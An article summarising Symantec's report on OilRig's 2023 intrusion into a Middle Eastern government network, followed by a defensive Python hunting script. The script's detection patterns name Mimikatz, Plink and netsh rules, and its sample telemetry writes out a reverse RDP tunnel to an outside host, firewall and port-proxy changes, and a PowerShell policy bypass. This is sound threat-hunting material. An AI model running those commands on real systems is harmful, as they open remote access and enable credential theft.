OilRig's 8-Month Stay Inside a Middle Eastern Government Network
Category: Threat Actor Activity | Industry: Government | Source: Symantec
Over eight months, from February to September 2023, the Iranian espionage group known as OilRig (also tracked as APT34 and Crambus) ran a persistent intrusion against a government entity in the Middle East. Researchers from Symantec's Threat Hunter Team report that the attackers exfiltrated files and passwords, and in one instance installed a PowerShell backdoor named PowerExchange. This backdoor monitored incoming email on an Exchange Server, allowing the threat actors to issue commands by email while discreetly forwarding the results back to them. Symantec found that the threat actors compromised "at least 12 computers and there is evidence that the attackers deployed backdoors and keyloggers on dozens more."
The attackers ran malicious activity sporadically from February 1st, 2023 to September 9th, 2023. Throughout this operation, OilRig showed a preference for stealth and for sophisticated techniques, including the use of Plink and Mimikatz and the configuration of port-forwarding rules to enable remote access via Remote Desktop Protocol (RDP). The attackers also modified Windows firewall rules to permit remote access, deployed various BAT and PowerShell scripts, and copied those scripts across the network. When pivoting between hosts, the attackers often ran netstat to map the system's network connections before establishing connections over RDP or Plink.
A noticeable gap appeared from May 8th until June 4th, during which malicious activity on the network halted. It was only four months after the first sign of malicious activity that the attackers deployed their PowerExchange script, setapp.ps1, which can execute commands issued by the attackers. They achieved this "by logging into compromised mailboxes on an Exchange Server and monitoring for incoming emails from the attackers. Emails that contain “@@” in the subject line are read by Backdoor.PowerExchange and have the ability to execute commands received from the attackers, effectively using the Exchange Server as a C&C," as Symantec explains. After this, they resumed their previous pattern of activity until September 9th, when their activity on the compromised network ceased.
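As an added illustration (not part of Symantec's report or this article), the following Python hunting script maps the behaviours described above to detection patterns, runs them over constructed sample telemetry, and reports the longest lull in flagged activity. The hostnames, timestamps and exact command lines are assumptions; the report does not quote the attackers' commands.

```python
import re
from datetime import datetime

# Behaviours Symantec attributes to this intrusion, as detection patterns over
# command lines and mail subjects. The exact command syntax is assumed; the
# report does not quote the attackers' commands.
RULES = [
    ("recon: netstat", re.compile(r"\bnetstat\b", re.I)),
    ("tunnel: Plink", re.compile(r"\bplink(\.exe)?\b", re.I)),
    ("credential theft: Mimikatz", re.compile(r"mimikatz|sekurlsa::", re.I)),
    ("port-forwarding rule", re.compile(r"netsh\s+interface\s+portproxy\s+add", re.I)),
    ("firewall rule change", re.compile(r"netsh\s+advfirewall\s+firewall\s+(add|set)\s+rule", re.I)),
    ("PowerExchange script", re.compile(r"setapp\.ps1", re.I)),
    ("PowerExchange C&C mail", re.compile(r"^subject=.*@@")),
]

# Constructed telemetry (hosts, times and commands are made up): (timestamp, host,
# source, detail); "process" = process-creation command line, "mail" = a
# message-tracking entry reduced to its subject.
EVENTS = [
    ("2023-02-01T09:12:00", "ws-04", "process", "netstat -ano"),
    ("2023-02-01T09:15:00", "ws-04", "process", "plink.exe -N -R 3389:127.0.0.1:3389 203.0.113.10"),
    ("2023-02-25T11:00:00", "srv-02", "process", "netsh advfirewall firewall add rule name=rdp dir=in action=allow protocol=TCP localport=3389"),
    ("2023-03-20T14:05:00", "srv-02", "process", "netsh interface portproxy add v4tov4 listenport=443 connectaddress=10.0.0.5 connectport=3389"),
    ("2023-04-12T10:30:00", "ws-11", "process", "mimikatz.exe"),
    ("2023-05-07T16:40:00", "ws-11", "process", "netstat -an"),
    ("2023-05-20T10:00:00", "ws-11", "process", "explorer.exe"),
    ("2023-06-05T08:30:00", "mail-01", "process", "powershell.exe -ep bypass -f C:\\Users\\Public\\setapp.ps1"),
    ("2023-06-05T08:31:00", "mail-01", "mail", "subject=@@ hostname"),
    ("2023-06-05T08:35:00", "mail-01", "mail", "subject=Quarterly report"),
]

def classify(detail):
    """Return the first matching behaviour label, or None if nothing matches."""
    for label, pattern in RULES:
        if pattern.search(detail):
            return label
    return None

def hunt(events):
    """Flag matching events; returns (datetime, host, label, detail) in time order."""
    hits = [(datetime.fromisoformat(ts), host, label, detail)
            for ts, host, _src, detail in events if (label := classify(detail))]
    return sorted(hits)

def quietest_stretch(hits):
    """Longest pause between consecutive hits (the report notes a May-June lull)."""
    pairs = zip(hits, hits[1:])
    return max(((a[0], b[0]) for a, b in pairs), key=lambda p: p[1] - p[0])
```

Running `hunt(EVENTS)` flags eight of the ten sample events and leaves the benign process and mail entries alone; `quietest_stretch` on those hits returns the May 7 to June 5 pause.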